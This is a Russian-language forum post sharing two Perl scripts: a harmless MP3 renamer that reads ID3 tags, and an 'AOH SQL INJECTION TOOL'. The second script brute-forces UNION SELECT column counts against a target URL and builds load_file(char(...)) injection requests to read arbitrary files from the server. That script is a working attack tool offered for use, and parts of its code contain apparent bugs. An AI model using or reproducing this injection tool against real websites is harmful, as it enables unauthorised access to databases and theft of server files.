03.12.2006, 12:41
|
|
Участник форума
Регистрация: 09.12.2005
Сообщений: 162
Провел на форуме:
701592
Репутация:
91
|
|
Вот прикольный скрипт (переделывает имя MP3 файла из инфы в тэгах) полезно для спутниковой рыбалки, и сортировки музыки
Код:
use strict;
my ($d) = @ARGV;
$d = './' unless $d;
my @l= ();
die unless opendir(my $h, $d);
foreach(readdir $h)
{ next if /^\.+$/;
push @l, $_ if /\.mp3$/i;
}
closedir $h;
my $c = 0;
foreach my $f (@l)
{
next unless open my $h, "<$d/$f";
binmode $h;
read $h, my $t, 3;
my($a,$n) = ('','');
if($t eq 'ID3')
{ read $h, $t, 1000;
if($t =~ /TIT2...(.)...(.*)/s)
{ $n = substr $2, 0, -1+ord $1;
}
if($t =~ /TPE1...(.)...(.*)/s)
{ $a = substr $2, 0, -1+ord $1;
}
}
else
{ seek $h, -128, 2;
read $h, $t, 3;
if($t eq 'TAG')
{ read $h, $t, 128;
($n,$a) = unpack "a30a30", $t;
}
}
close $h;
$n =~ s/[\0\s\r\n]+$//s;
$a =~ s/[\0\s\r\n]+$//s;
next if $a eq '';
next if $n eq '';
my $r = "$a - $n";
$r =~ s/http:\/\///ig;
$r =~ s/[\0-\39]//g;
$r =~ s/[\\\/\:\*\?\"\<\>\|]/_/g;
while($r =~ /\s\s/) { $r =~ s/\s\s/ /; }
my $s = $r;
$s =~ tr/\300-\377\260\261/\200-\257\340-\357\360\361/;
printf "%s\n", $s;
$r .= '.mp3';
next if $r eq $f;
while(-e "$d/$r") { $r =~ s/\.mp3$/_\.mp3/; }
if(rename "$d/$f", "$d/$r") { $c++; }
else { print "$f $!\n"; }
}
printf "renamed %d of %d\n", $c, scalar @l;
Вот подборщик кол-во union (вывод с load_file пока не доделал) запускать СКРИПТ.pl 1
Код:
#!/usr/bin/perl
#=========================================================================#
use LWP::UserAgent;
use Getopt::Std;
#=========================================================================#
#=========================================================================#
#=MAIN===================================================================#
print "\n AAAAAA OOOOOO H H\n";
print " A A O O H H\n";
print " AAAAAA O O HHHHH\n";
print " A A O O H H\n";
print " A A OOOOOO H H\n\n";
$filt=1; #only chars in resolt
my $www = LWP::UserAgent->new;
uss();
if(!$ARGV[0]) {
ans();
while (true)
{
print "\nNew file (^c for quit) ->";
$f=<STDIN>;
$f =~ s/\n//;
enc(); #encode file
burl();
conn();
getres();
}
}
else
{
print "Url for brute-> "; $u=<STDIN>;
$u =~ s/\n//;
brute();
}
#=END=MAIN============================================================#
#=======================================================================#
sub brute()
{
$max=20;
$res='';
for ($j=1;$j<$max;$j++)
{
for ($i=1;$i<$j+1;$i++)
{$utmp.=$i."26639-1,";}
$utmp = substr($utmp, 0, length ($utmp) - 1 );
$utmp = $u." UNION SELECT ".$utmp."/*";
if($coll=chk($utemp)) {$utmp =~ s\26639-1\\g; print("[+$j] OK! Coloun number $coll is visible\r\n$utmp"); exit(0);}
else {print("[-$j] falure... ($szz Bytes)\r\n");}
#print $utmp."\r\n";
$utmp="";
}
}
sub chk()
{
$resp = $www -> get( $utmp ) or die();
$szz=length($resp->content());
if ($resp->content() =~ /(\d+)26638/) {return($1);}
}
sub ans()
{
print "\nAnsver some questions ;)\r\n";
print "Url for union-> "; $u=<STDIN>;
print "Number of coloums -> "; $n=<STDIN>;
print "Coloum with union -> "; $c=<STDIN>;
$u =~ s/\n//;
$f =~ s/\n//;
}
sub enc()
{
for ($i=0;$i<length($f);$i++) {$enc .= ord(substr($f, $i,1 )).',';}
$enc = substr($enc, 0, length ($enc) - 1 );
$f=$enc;
$enc='';
}
sub burl()
{
print "[~] File: $f\n";
$ur = $u; $tmp='';
for ($i=0;$i<$n;$i++)
{
if($i==$c-1) {
$tmp.="load_file(char($f)),";
}
else {$tmp.="0,";}
}
$tmp = substr($tmp, 0, length ($tmp) - 1 );
$ur.= "+union+select+$tmp/*";
print "[~] url: $ur\n";
}
sub conn ()
{
print "[~] Sending ...\n";
my $resp = $www -> get( $ur );
$cont = $resp -> content();
}
sub getres()
{
$s="</b><br><br>";
$e="</p></p>";
$result;
#print $cont;
print "[~] Start: $s \n";
print "[~] End: $e \n";
print "[~] Searching...\n ";
@stringz=split("\n",$cont);
for(@stringz)
{
if(/$e/) { $p = 0; }
$result .= $_."\r\n" if $p;
if(/$s/){ $p = 1; }
}
$result =~ tr/a-zA-Z /a-zA-Z/d;
if($result) { print "[+] I found something! \n\n $result"; }
else {print "[-] Not found...\n ";}
$result='';
}
sub uss()
{
print 'AOH SQL INJECTION TOOL By AoH]Slon'."\n";
print 'Use aoh.pl 1 for brute colouns'."\n\n";
}
|
|
|